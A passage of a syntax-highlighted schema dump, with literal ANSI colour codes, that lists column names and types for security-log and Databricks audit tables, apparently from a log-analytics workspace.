\u001b[94m\"DestinationNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceEventClassID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceExternalID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceFacility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceInboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceMacAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceNtDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceOutboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DevicePayloadId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceProduct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTimeZone\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVendor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalLogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Protocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceiptTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestClientApplication\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCookies\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"SimplifiedDeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatConfidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ComputerGroup\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryLoginEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JwtId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryRepositoryEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"ArtifactType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Digest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MediaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Repository\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Size\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tag\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksAccounts\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksClusters\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksDBFS\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksJobs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksNotebook\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: 